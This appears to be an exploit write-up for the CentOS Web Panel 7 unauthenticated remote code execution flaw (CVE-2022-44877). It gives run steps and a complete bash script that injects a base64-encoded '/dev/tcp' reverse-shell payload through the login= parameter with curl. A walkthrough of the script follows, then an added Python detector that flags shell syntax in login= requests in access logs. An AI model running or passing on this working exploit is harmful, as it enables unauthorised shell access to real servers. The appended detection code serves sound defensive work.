Here is the exploitation script for CentOS Web Panel 7 (CWP) unauthenticated RCE, CVE-2022-44877.
The script is available here:
https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2022%E2%80%9344877/CVE-2022-44877Exploit.sh
Run listener:
Make the script executable:
chmod +x CVE-2022-44877Exploit.sh
Run the script:
./CVE-2022-44877Exploit.sh https://192.168.1.108:2031/ root 192.168.1.103 9001
Now we received a connection:
You can watch the exploitation script video here:
#!/bin/bash
function help {
    echo "[-] USAGE: $0 Target_URL Target_username LHOST LPORT"
    echo "[-] Example: $0 https://192.168.1.108:2031/ root 192.168.1.100 9001"
    exit 1
}
function exploit {
    target_url=$1
    target_un=$2
    lhost=$3
    lport=$4
    payload="sh -i >& /dev/tcp/${lhost}/${lport} 0>&1"
    payload_base64=$(echo -n ${payload} | base64)
    target_ip=$(egrep -o '([0-9]{1,3}[.]){3}[0-9]{1,3}' <<< ${target_url})
    echo $target_ip
    port=$(echo ${target_url} | grep -oP ':\K\d+')
    echo $port
    curl -i -s -k -X $'POST' \
        -H $'Host: '${target_ip}':'${port} \
        -H $'Content-Type: application/x-www-form-urlencoded' \
        --data-binary $'username='${target_un}'&password=test&commit=Login' \
        -g ${target_url}'login/index.php?login=$(echo${IFS}'${payload_base64}'${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)'
}
if [[ $# -eq 4 ]]; then
    exploit "$1" "$2" "$3" "$4"
else
    help
fi
This script has two main functions: help and exploit.
The help function is called if the user does not provide the correct number of arguments when running the script. It displays usage information and an example of how to run the script.
The exploit function takes four arguments: the target URL, the target username, the local host IP address, and the local port number.
First, the script defines the payload, which is a command that creates a reverse shell. The payload is then encoded in base64. The script then extracts the target IP address and port number from the URL, and uses the curl command to send an HTTP POST request to the target with the payload in the login= parameter.
The payload is executed on the target server by base64-decoding it and then running the resulting command in bash.
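For defenders, the request described above leaves a recognisable trace in web server access logs: shell syntax inside the login= query parameter of login/index.php. The following Python check is an added example, not part of the original post or its script; the combined log format, the function name and all sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Requests to login/index.php carrying a login= query parameter (the request
# shape the script above sends). Assumes combined-log-format access logs.
REQUEST_RE = re.compile(r'"[A-Z]+ \S*/login/index\.php\?(?:\S*&)?login=(\S*) HTTP/')
# Shell syntax with no place in a login value: command substitution,
# ${...} expansion such as ${IFS}, backticks, pipes, command separators.
SHELL_RE = re.compile(r"\$\(|\$\{|`|\||;")

# Constructed sample lines (documentation IP ranges, placeholder payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jan/2023:10:00:01 +0000] "POST /login/index.php?login='
    '$(echo${IFS}BASE64PLACEHOLDER${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)'
    ' HTTP/1.1" 302 0',
    '192.0.2.11 - - [05/Jan/2023:10:02:13 +0000] '
    '"POST /login/index.php?login=%24%28id%29 HTTP/1.1" 302 0',
    '198.51.100.7 - - [05/Jan/2023:10:05:40 +0000] '
    '"GET /login/index.php?login=failed HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Jan/2023:10:05:41 +0000] '
    '"GET /login/index.php HTTP/1.1" 200 5120',
]

def suspicious_logins(lines):
    """Return (client_ip, decoded login value) for requests with shell syntax in login=."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = match.group(1)
        for _ in range(3):  # undo up to three layers of percent-encoding
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if SHELL_RE.search(value):
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_logins(SAMPLE_LOG):
        print(f"ALERT {ip} login={value}")
```

A hit shows that the request was attempted, not that the command ran; correlate it with outbound connections from the panel host around the same timestamp.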